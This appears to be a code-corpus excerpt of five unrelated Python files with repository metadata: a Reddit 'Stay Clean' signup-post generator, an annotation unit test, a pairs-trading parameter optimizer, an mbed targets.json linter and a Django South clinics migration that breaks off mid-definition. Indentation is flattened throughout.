answer += "Hey everybody, we had a great turnout for [Stay Clean CURRENT_MONTH_NAME](CURRENT_MONTH_URL) - let's see if we can knock it out of the park for NEXT_MONTH_NAME. Have you been clean for the month of CURRENT_MONTH_NAME? Great! Join us here, and let's keep our streak going. Did you slip in CURRENT_MONTH_NAME? Then NEXT_MONTH_NAME is your month to shine, and we will gladly fight the good fight along with you. Did you miss out on the CURRENT_MONTH_NAME challenge? Well then here is your opportunity to join us.\n"
answer += "\n"
answer += "If you would like to be included in this challenge, please post a brief comment to this thread, and I will include you. After midnight, NEXT_MONTH_NAME 1, the sign up window will close, and the challenge will begin."
return answer
def templateForMiddleSignupDays():
answer = ""
answer += "STAY CLEAN UPPERCASE_MONTH! Sign up here! (CURRENT_MONTH_NAME CURRENT_DAY_OF_MONTH_INDEX)\n"
answer += "Hey everybody, so far **INITIAL_NUMBER participants** have signed up. Have you been clean for **[the month of CURRENT_MONTH_NAME](CURRENT_MONTH_URL)**? Great! Join us here, and let's keep our streak going. Did you slip in CURRENT_MONTH_NAME? Then NEXT_MONTH_NAME is your month to shine, and we will gladly fight the good fight along with you. Did you miss out on the CURRENT_MONTH_NAME challenge? Well then here is your opportunity to join us.\n"
answer += "\n"
answer += "If you would like to be included in this challenge, please post a brief comment to this thread (if you haven't already done so on an earlier signup thread), and I will include you. After midnight, NEXT_MONTH_NAME 1, the sign up window will close, and the challenge will begin.\n"
answer += "\n"
answer += templateForParticipants()
return answer
def templateForLastSignupDay():
answer = ""
answer += "LAST CHANCE TO SIGN UP FOR STAY CLEAN UPPERCASE_MONTH! Sign up here!\n"
answer += "The Stay Clean NEXT_MONTH_NAME challenge **begins tomorrow**! So far, we have **INITIAL_NUMBER participants** signed up. If you would like to be included in the challenge, please post a brief comment to this thread (if you haven't already done so on an earlier signup thread), and we will include you. After midnight tonight, we will not be accepting any more participants. I will create the official update post tomorrow.\n"
answer += "\n"
answer += templateForParticipants()
return answer
def templateToUse():
if currentDayOfMonthIndex <= (currentMonthTotalDays - 7):
return templateForTooEarly()
elif currentDayOfMonthIndex == (currentMonthTotalDays - 6):
return templateForFirstSignupDay()
elif (currentMonthTotalDays - 5) <= currentDayOfMonthIndex <= (currentMonthTotalDays - 1):
return templateForMiddleSignupDays()
elif currentMonthTotalDays == currentDayOfMonthIndex:
return templateForLastSignupDay()
def stringToPrint():
answer = templateToUse()
answer = re.sub('INITIAL_NUMBER', str(initialNumber), answer)
answer = re.sub('CURRENT_MONTH_INDEX', str(currentMonthIndex), answer)
answer = re.sub('CURRENT_MONTH_TOTAL_DAYS', str(currentMonthTotalDays), answer)
answer = re.sub('CURRENT_MONTH_PENULTIMATE_DAY_INDEX', str(currentMonthPenultimateDayIndex), answer)
answer = re.sub('CURRENT_MONTH_NAME', currentMonthName, answer)
answer = re.sub('CURRENT_MONTH_URL', currentMonthURL, answer)
answer = re.sub('NEXT_MONTH_INDEX', str(nextMonthIndex), answer)
answer = re.sub('NEXT_MONTH_NAME', nextMonthName, answer)
answer = re.sub('CURRENT_DAY_OF_MONTH_INDEX', str(currentDayOfMonthIndex), answer)
answer = re.sub('CURRENT_DAY_OF_MONTH_NAME', currentDayOfMonthName, answer)
answer = re.sub('CURRENT_DAY_OF_WEEK_NAME', currentDayOfWeekName, answer)
answer = re.sub('UPPERCASE_MONTH', uppercaseMonth, answer)
return answer
outputString = stringToPrint()
print "============================================================="
print outputString
print "============================================================="
pyperclip.copy(outputString)
|
foobarbazblarg/stayclean
|
stayclean-2017-february/display-during-signup.py
|
Python
|
mit
| 6,610
|
from rambutan3.check_args.annotation.ANY import ANY
from rambutan3.check_args.annotation.INT import INT
from rambutan3.check_args.annotation.ONE_OR_MORE_OF import ONE_OR_MORE_OF
def test():
assert ONE_OR_MORE_OF(ANY).matches(None)
assert ONE_OR_MORE_OF(ANY).matches([None])
assert ONE_OR_MORE_OF(INT).matches(123)
assert not ONE_OR_MORE_OF(INT).matches('abc')
assert ONE_OR_MORE_OF(INT).matches([123])
assert not ONE_OR_MORE_OF(INT).matches(['abc'])
assert not ONE_OR_MORE_OF(INT).matches([])
assert not ONE_OR_MORE_OF(INT).matches(set())
assert ONE_OR_MORE_OF(INT).matches({1,2,3})
|
kevinarpe/kevinarpe-rambutan3
|
tests/check_args/annotation/test_ONE_OR_MORE_OF.py
|
Python
|
gpl-3.0
| 621
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 30 19:07:37 2017
@author: AmatVictoriaCuramIII
"""
import numpy as np
import random as rand
import pandas as pd
import time as t
#from DatabaseGrabber import DatabaseGrabber
from YahooGrabber import YahooGrabber
from ListPairs import ListPairs
Empty = []
Start = t.time()
Counter = 0
Counter2 = 0
iterations = range(0, 200)
Dataset2 = pd.DataFrame()
#Input
tickers = ('TLT', 'SPY', 'TMF', 'AAPL', 'PBF', 'UVXY', '^VIX', 'GLD', 'SLV',
           'JO', 'CORN', 'DBC', 'SOYB')
#Make all pairs in final list
MajorList = ListPairs(tickers)
#Here we go
#Brute Force Optimization
for m in MajorList:
Dataset = pd.DataFrame()
Ticker1 = m[0]
Ticker2 = m[1]
TAG = m[0] + '/' + m[1]
Dataset = pd.DataFrame()
Portfolio = pd.DataFrame()
#pull online data, change to local for testing
Asset1 = YahooGrabber(Ticker1)
Asset2 = YahooGrabber(Ticker2)
#get log returns
Asset1['LogRet'] = np.log(Asset1['Adj Close']/Asset1['Adj Close'].shift(1))
Asset1['LogRet'] = Asset1['LogRet'].fillna(0)
Asset2['LogRet'] = np.log(Asset2['Adj Close']/Asset2['Adj Close'].shift(1))
Asset2['LogRet'] = Asset2['LogRet'].fillna(0)
#Match lengths
trim = abs(len(Asset1) - len(Asset2))
if len(Asset1) == len(Asset2):
pass
else:
if len(Asset1) > len(Asset2):
Asset1 = Asset1[trim:]
else:
Asset2 = Asset2[trim:]
#
for i in iterations:
Counter = Counter + 1
aa = rand.random() * 2 #uniformly distributed random number 0 to 2
        a = aa - 1 #a > 0 indicates a long position in asset 1
bb = rand.random()
if bb >= .5:
bb = 1
else:
bb = -1
b = bb * (1 - abs(a))
#you can change c and d to 0 by default if you want to just go flat
cc = rand.random() * 2 #uniformly distributed random number 0 to 2
        c = cc - 1 #c > 0 indicates a long position once the spread signal triggers
dd = rand.random() * 2
        d = (dd - 1) #uniformly distributed in [-1, 1)
if abs(c) + abs(d) > 1:
continue
e = rand.randint(3,25)
f = rand.randint(3,25)
g = rand.randint(3,60)
h = rand.randint(3,60)
if g < e:
continue
if h < f:
continue
window = int(e)
window2 = int(f)
window3 = int(g)
        window4 = int(h)
n = .1 - (rand.random())/5
o = .1 - (rand.random())/5
Asset1['smallSMA'] = Asset1['Adj Close'].rolling(window=e, center=False).mean()
Asset2['smallSMA'] = Asset2['Adj Close'].rolling(window=f, center=False).mean()
Asset1['largeSMA'] = Asset1['Adj Close'].rolling(window=g, center=False).mean()
Asset2['largeSMA'] = Asset2['Adj Close'].rolling(window=h, center=False).mean()
Asset1['SMAspread'] = Asset1['smallSMA'] - Asset1['largeSMA']
Asset2['SMAspread'] = Asset2['smallSMA'] - Asset2['largeSMA']
Asset1['Position'] = a
Asset1['Position'] = np.where(Asset1['SMAspread'].shift(1) > n,
c,a)
Asset1['Pass'] = (Asset1['LogRet'] * Asset1['Position'])
Asset2['Position'] = b
Asset2['Position'] = np.where(Asset2['SMAspread'].shift(1) > o,
d,b)
Asset2['Pass'] = (Asset2['LogRet'] * Asset2['Position'])
Portfolio['Asset1Pass'] = (Asset1['Pass']) #* (-1) #Pass a short position?
Portfolio['Asset2Pass'] = (Asset2['Pass']) #* (-1) #Pass a short position?
Portfolio['LongShort'] = Portfolio['Asset1Pass'] + Portfolio['Asset2Pass']
if Portfolio['LongShort'].std() == 0:
continue
Portfolio['Multiplier'] = Portfolio['LongShort'].cumsum().apply(np.exp)
drawdown = 1 - Portfolio['Multiplier'].div(Portfolio['Multiplier'].cummax())
MaxDD = max(drawdown)
if MaxDD > float(.5):
continue
dailyreturn = Portfolio['LongShort'].mean()
if dailyreturn < .0003:
continue
dailyvol = Portfolio['LongShort'].std()
sharpe =(dailyreturn/dailyvol)
Portfolio['Multiplier'] = Portfolio['LongShort'].cumsum().apply(np.exp)
drawdown = 1 - Portfolio['Multiplier'].div(Portfolio['Multiplier'].cummax())
MaxDD = max(drawdown)
print(Counter)
Empty.append(a)
Empty.append(b)
Empty.append(c)
Empty.append(d)
Empty.append(e)
Empty.append(f)
Empty.append(g)
Empty.append(h)
Empty.append(n)
Empty.append(o)
Empty.append(sharpe)
Empty.append(sharpe/MaxDD)
Empty.append(dailyreturn/MaxDD)
Empty.append(MaxDD)
Emptyseries = pd.Series(Empty)
Dataset[0] = Emptyseries.values
Dataset[i] = Emptyseries.values
Empty[:] = []
#find optimal parameters from pair
z1 = Dataset.iloc[11]
w1 = np.percentile(z1, 80)
    v1 = [] #stores the metric values above the Nth percentile
    DS1W = pd.DataFrame() #stores the top-performing parameter sets for this pair
for l in z1:
if l > w1:
v1.append(l)
for j in v1:
r = Dataset.columns[(Dataset == j).iloc[11]]
DS1W = pd.concat([DS1W,Dataset[r]], axis = 1)
y = max(z1)
k = Dataset.columns[(Dataset == y).iloc[11]] #this is the column number
kfloat = float(k[0])
End = t.time()
print(End-Start, 'seconds later')
Dataset[TAG] = Dataset[kfloat]
Dataset2[TAG] = Dataset[TAG]
Dataset2 = Dataset2.rename(columns = {Counter2:TAG})
Counter2 = Counter2 + 1
# print(Dataset[TAG])
Portfolio2 = pd.DataFrame()
#find some winning parameters
z1 = Dataset2.iloc[11]
w1 = np.percentile(z1, 99)
v1 = [] #stores the metric values above the Nth percentile
winners = pd.DataFrame() #stores the overall top-performing pairs
for l in z1:
if l > w1:
v1.append(l)
for j in v1:
r = Dataset2.columns[(Dataset2 == j).iloc[11]]
winners = pd.concat([winners,Dataset2[r]], axis = 1)
y = max(z1)
k = Dataset2.columns[(Dataset2 == y).iloc[11]] #this is the name of the pair
kfloat = str(k[0])
#most likely, you will want to export to csv for further future investigation
#print(Dataset[TAG])
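# A minimal sketch of that CSV export (the filename is hypothetical, not part of
# the original script); Dataset2 holds the winning parameter column per pair:
# Dataset2.to_csv('pair_parameters.csv')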
num = kfloat.find('/')
num2 = num + 1
#re-download the winning pair's time series and recompute log returns, starting here
Asset3 = YahooGrabber(kfloat[:num])
Asset4 = YahooGrabber(kfloat[num2:])
trim = abs(len(Asset3) - len(Asset4))
if len(Asset3) == len(Asset4):
pass
else:
if len(Asset3) > len(Asset4):
Asset3 = Asset3[trim:]
else:
Asset4 = Asset4[trim:]
#get log returns
Asset3['LogRet'] = np.log(Asset3['Adj Close']/Asset3['Adj Close'].shift(1))
Asset3['LogRet'] = Asset3['LogRet'].fillna(0)
Asset4['LogRet'] = np.log(Asset4['Adj Close']/Asset4['Adj Close'].shift(1))
Asset4['LogRet'] = Asset4['LogRet'].fillna(0)
window = int((Dataset2[kfloat][4]))
window2 = int((Dataset2[kfloat][5]))
window3 = int((Dataset2[kfloat][6]))
window4 = int((Dataset2[kfloat][7]))
threshold = Dataset2[kfloat][8]
threshold2 = Dataset2[kfloat][9]
Asset3['smallSMA'] = Asset3['Adj Close'].rolling(window=window, center=False).mean()
Asset4['smallSMA'] = Asset4['Adj Close'].rolling(window=window2, center=False).mean()
Asset3['largeSMA'] = Asset3['Adj Close'].rolling(window=window3, center=False).mean()
Asset4['largeSMA'] = Asset4['Adj Close'].rolling(window=window4, center=False).mean()
Asset3['SMAspread'] = Asset3['smallSMA'] - Asset3['largeSMA']
Asset4['SMAspread'] = Asset4['smallSMA'] - Asset4['largeSMA']
Asset3['Position'] = (Dataset2[k[0]][0])
Asset3['Position'] = np.where(Asset3['SMAspread'].shift(1) > threshold,
Dataset2[k[0]][2],Dataset2[k[0]][0])
Asset3['Pass'] = (Asset3['LogRet'] * Asset3['Position'])
Asset4['Position'] = (Dataset2[kfloat][1])
Asset4['Position'] = np.where(Asset4['SMAspread'].shift(1) > threshold2,
Dataset2[k[0]][3],Dataset2[k[0]][1])
Asset4['Pass'] = (Asset4['LogRet'] * Asset4['Position'])
#
Portfolio2['Asset3Pass'] = Asset3['Pass'] #* (-1)
Portfolio2['Asset4Pass'] = Asset4['Pass'] #* (-1)
Portfolio2['LongShort'] = Portfolio2['Asset3Pass'] + Portfolio2['Asset4Pass']
Portfolio2['LongShort'][:].cumsum().apply(np.exp).plot(grid=True,
figsize=(8,5))
dailyreturn = Portfolio2['LongShort'].mean()
dailyvol = Portfolio2['LongShort'].std()
sharpe =(dailyreturn/dailyvol)
Portfolio2['Multiplier'] = Portfolio2['LongShort'].cumsum().apply(np.exp)
drawdown2 = 1 - Portfolio2['Multiplier'].div(Portfolio2['Multiplier'].cummax())
#conversionfactor = Portfolio['PriceRelative'][-1]
print(kfloat)
print('--------')
print(Dataset2[kfloat])
print('Max Drawdown is ',max(drawdown2),'See Dataset2')
##pd.to_pickle(Portfolio, 'VXX:UVXY')
|
adamrvfisher/TechnicalAnalysisLibrary
|
SpeedDaterSMAspread.py
|
Python
|
apache-2.0
| 9,366
|
"""A linting utility for targets.json
This linting utility may be called as follows:
python <path-to>/lint.py targets TARGET [TARGET ...]
the listed targets will be linted; use the all-targets subcommand to lint everything
"""
# mbed SDK
# Copyright (c) 2017 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from os.path import join, abspath, dirname
if __name__ == "__main__":
import sys
ROOT = abspath(join(dirname(__file__), "..", ".."))
sys.path.insert(0, ROOT)
from copy import copy
from yaml import dump_all
import argparse
from tools.targets import Target, set_targets_json_location, TARGET_MAP
def must_have_keys(keys, dict):
"""Require keys in an MCU/Board
is a generator for errors
"""
for key in keys:
if key not in dict:
yield "%s not found, and is required" % key
def may_have_keys(keys, dict):
"""Disable all other keys in an MCU/Board
is a generator for errors
"""
for key in dict.keys():
if key not in keys:
yield "%s found, and is not allowed" % key
def check_extra_labels(dict):
"""Check that extra_labels does not contain any Target names
is a generator for errors
"""
for label in (dict.get("extra_labels", []) +
dict.get("extra_labels_add", [])):
if label in Target.get_json_target_data():
yield "%s is not allowed in extra_labels" % label
def check_release_version(dict):
"""Verify that release version 5 is combined with support for all toolcahins
is a generator for errors
"""
if ("release_versions" in dict and
"5" in dict["release_versions"] and
"supported_toolchains" in dict):
for toolc in ["GCC_ARM", "ARM", "IAR"]:
if toolc not in dict["supported_toolchains"]:
yield ("%s not found in supported_toolchains, and is "
"required by mbed OS 5" % toolc)
def check_inherits(dict):
if ("inherits" in dict and len(dict["inherits"]) > 1):
yield "multiple inheritance is forbidden"
DEVICE_HAS_ALLOWED = ["ANALOGIN", "ANALOGOUT", "CAN", "ETHERNET", "EMAC",
"FLASH", "I2C", "I2CSLAVE", "I2C_ASYNCH", "INTERRUPTIN",
"LPTICKER", "PORTIN", "PORTINOUT", "PORTOUT",
"PWMOUT", "RTC", "TRNG","SERIAL", "SERIAL_ASYNCH",
"SERIAL_FC", "SLEEP", "SPI", "SPI_ASYNCH", "SPISLAVE",
"STORAGE", "STCLK_OFF_DURING_SLEEP"]
def check_device_has(dict):
for name in dict.get("device_has", []):
if name not in DEVICE_HAS_ALLOWED:
yield "%s is not allowed in device_has" % name
MCU_REQUIRED_KEYS = ["release_versions", "supported_toolchains",
"default_lib", "public", "inherits", "device_has"]
MCU_ALLOWED_KEYS = ["device_has_add", "device_has_remove", "core",
"extra_labels", "features", "features_add",
"features_remove", "bootloader_supported", "device_name",
"post_binary_hook", "default_toolchain", "config",
"extra_labels_add", "extra_labels_remove",
"target_overrides"] + MCU_REQUIRED_KEYS
def check_mcu(mcu_json, strict=False):
"""Generate a list of problems with an MCU
:param: mcu_json the MCU's dict to check
:param: strict enforce required keys
"""
errors = list(may_have_keys(MCU_ALLOWED_KEYS, mcu_json))
if strict:
errors.extend(must_have_keys(MCU_REQUIRED_KEYS, mcu_json))
errors.extend(check_extra_labels(mcu_json))
errors.extend(check_release_version(mcu_json))
errors.extend(check_inherits(mcu_json))
errors.extend(check_device_has(mcu_json))
if 'public' in mcu_json and mcu_json['public']:
errors.append("public must be false")
return errors
BOARD_REQUIRED_KEYS = ["inherits"]
BOARD_ALLOWED_KEYS = ["supported_form_factors", "is_disk_virtual",
"detect_code", "extra_labels", "extra_labels_add",
"extra_labels_remove", "public", "config",
"forced_reset_timeout", "target_overrides"] + BOARD_REQUIRED_KEYS
def check_board(board_json, strict=False):
"""Generate a list of problems with an board
:param: board_json the mcus dict to check
:param: strict enforce required keys
"""
errors = list(may_have_keys(BOARD_ALLOWED_KEYS, board_json))
if strict:
errors.extend(must_have_keys(BOARD_REQUIRED_KEYS, board_json))
errors.extend(check_extra_labels(board_json))
errors.extend(check_inherits(board_json))
return errors
def add_if(dict, key, val):
"""Add a value to a dict if it's non-empty"""
if val:
dict[key] = val
def _split_boards(resolution_order, tgt):
"""Split the resolution order between boards and mcus"""
mcus = []
boards = []
iterable = iter(resolution_order)
for name in iterable:
mcu_json = tgt.json_data[name]
if (len(list(check_mcu(mcu_json, True))) >
len(list(check_board(mcu_json, True)))):
boards.append(name)
else:
mcus.append(name)
break
mcus.extend(iterable)
mcus.reverse()
boards.reverse()
return mcus, boards
MCU_FORMAT_STRING = {1: "MCU (%s) ->",
2: "Family (%s) -> MCU (%s) ->",
3: "Family (%s) -> SubFamily (%s) -> MCU (%s) ->"}
BOARD_FORMAT_STRING = {1: "Board (%s)",
2: "Module (%s) -> Board (%s)"}
def _generate_hierarchy_string(mcus, boards):
global_errors = []
if len(mcus) < 1:
global_errors.append("No MCUS found in hierarchy")
mcus_string = "??? ->"
elif len(mcus) > 3:
global_errors.append("No name for targets %s" % ", ".join(mcus[3:]))
mcus_string = MCU_FORMAT_STRING[3] % tuple(mcus[:3])
for name in mcus[3:]:
mcus_string += " ??? (%s) ->" % name
else:
mcus_string = MCU_FORMAT_STRING[len(mcus)] % tuple(mcus)
if len(boards) < 1:
global_errors.append("no boards found in hierarchy")
boards_string = "???"
elif len(boards) > 2:
global_errors.append("no name for targets %s" % ", ".join(boards[2:]))
boards_string = BOARD_FORMAT_STRING[2] % tuple(boards[:2])
for name in boards[2:]:
boards_string += " -> ??? (%s)" % name
else:
boards_string = BOARD_FORMAT_STRING[len(boards)] % tuple(boards)
return mcus_string + " " + boards_string, global_errors
def check_hierarchy(tgt):
"""Atempts to assign labels to the hierarchy"""
resolution_order = copy(tgt.resolution_order_names[:-1])
mcus, boards = _split_boards(resolution_order, tgt)
target_errors = {}
hierachy_string, hierachy_errors = _generate_hierarchy_string(mcus, boards)
to_ret = {"hierarchy": hierachy_string}
add_if(to_ret, "hierarchy errors", hierachy_errors)
for name in mcus[:-1]:
add_if(target_errors, name, list(check_mcu(tgt.json_data[name])))
if len(mcus) >= 1:
add_if(target_errors, mcus[-1],
list(check_mcu(tgt.json_data[mcus[-1]], True)))
for name in boards:
add_if(target_errors, name, list(check_board(tgt.json_data[name])))
if len(boards) >= 1:
add_if(target_errors, boards[-1],
list(check_board(tgt.json_data[boards[-1]], True)))
add_if(to_ret, "target errors", target_errors)
return to_ret
PARSER = argparse.ArgumentParser(prog="targets/lint.py")
SUBPARSERS = PARSER.add_subparsers(title="Commands")
def subcommand(name, *args, **kwargs):
def __subcommand(command):
kwargs['description'] = command.__doc__
subparser = SUBPARSERS.add_parser(name, **kwargs)
for arg in args:
arg = dict(arg)
opt = arg['name']
del arg['name']
if isinstance(opt, basestring):
subparser.add_argument(opt, **arg)
else:
subparser.add_argument(*opt, **arg)
def _thunk(parsed_args):
argv = [arg['dest'] if 'dest' in arg else arg['name']
for arg in args]
argv = [(arg if isinstance(arg, basestring)
else arg[-1]).strip('-').replace('-', '_')
for arg in argv]
argv = {arg: vars(parsed_args)[arg] for arg in argv
if vars(parsed_args)[arg] is not None}
return command(**argv)
subparser.set_defaults(command=_thunk)
return command
return __subcommand
@subcommand("targets",
dict(name="mcus", nargs="+", metavar="MCU",
choices=TARGET_MAP.keys(), type=str.upper))
def targets_cmd(mcus=[]):
"""Find and print errors about specific targets"""
print dump_all([check_hierarchy(TARGET_MAP[m]) for m in mcus],
default_flow_style=False)
@subcommand("all-targets")
def all_targets_cmd():
"""Print all errors about all parts"""
print dump_all([check_hierarchy(m) for m in TARGET_MAP.values()],
default_flow_style=False)
@subcommand("orphans")
def orphans_cmd():
"""Find and print all orphan targets"""
orphans = Target.get_json_target_data().keys()
for tgt in TARGET_MAP.values():
for name in tgt.resolution_order_names:
if name in orphans:
orphans.remove(name)
if orphans:
print dump_all([orphans], default_flow_style=False)
return len(orphans)
def main():
"""entry point"""
options = PARSER.parse_args()
return options.command(options)
if __name__ == "__main__":
sys.exit(main())
|
betzw/mbed-os
|
tools/targets/lint.py
|
Python
|
apache-2.0
| 10,114
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'Visit.service'
db.alter_column(u'clinics_visit', 'service_id', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['clinics.Service'], null=True))
def backwards(self, orm):
# Changing field 'Visit.service'
db.alter_column(u'clinics_visit', 'service_id', self.gf('django.db.models.fields.related.ForeignKey')(default=0, to=orm['clinics.Service']))
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'clinics.clinic': {
'Meta': {'object_name': 'Clinic'},
'category': ('django.db.models.fields.CharField', [], {'max_length': '32', 'blank': 'True'}),
'code': ('django.db.models.fields.PositiveIntegerField', [], {'unique': 'True'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_renovated': ('django.db.models.fields.CharField', [], {'max_length': '4', 'blank': 'True'}),
'lga': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'lga_rank': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '100'}),
'pbf_rank': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'}),
'town': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ward': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'year_opened': ('django.db.models.fields.CharField', [], {'max_length': '4', 'blank': 'True'})
},
u'clinics.clinicstaff': {
'Meta': {'object_name': 'ClinicStaff'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Clinic']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_manager': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'staff_type': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'year_started': ('django.db.models.fields.CharField', [], {'max_length': '4', 'blank': 'True'})
},
u'clinics.clinicstatistic': {
'Meta': {'unique_together': "[('clinic', 'statistic', 'month')]", 'object_name': 'ClinicStatistic'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Clinic']"}),
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'float_value': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'int_value': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'month': ('django.db.models.fields.DateField', [], {}),
'rank': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'statistic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['statistics.Statistic']"}),
'text_value': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
u'clinics.patient': {
'Meta': {'object_name': 'Patient'},
'clinic': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Clinic']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['rapidsms.Contact']", 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mobile': ('django.db.models.fields.CharField', [], {'max_length': '11', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'serial': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'clinics.region': {
'Meta': {'unique_together': "(('external_id', 'type'),)", 'object_name': 'Region'},
'alternate_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'boundary': ('django.contrib.gis.db.models.fields.MultiPolygonField', [], {}),
'external_id': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'default': "'lga'", 'max_length': '16'})
},
u'clinics.service': {
'Meta': {'object_name': 'Service'},
'code': ('django.db.models.fields.PositiveIntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '50'})
},
u'clinics.visit': {
'Meta': {'object_name': 'Visit'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'patient': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Patient']"}),
'service': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.Service']", 'null': 'True', 'blank': 'True'}),
'staff': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['clinics.ClinicStaff']", 'null': 'True', 'blank': 'True'}),
'visit_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'clinics.visitregistrationerror': {
'Meta': {'object_name': 'VisitRegistrationError'},
'error_count': ('django.db.models.fields.PositiveIntegerField', [], {}),
'error_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sender': ('django.db.models.fields.CharField', [], {'max_length': '20'})
},
u'clinics.visitregistrationerrorlog': {
'Meta': {'object_name': 'VisitRegistrationErrorLog'},
'error_type': ('django.db.models.fields.PositiveIntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.CharField', [], {'max_length': '160'}),
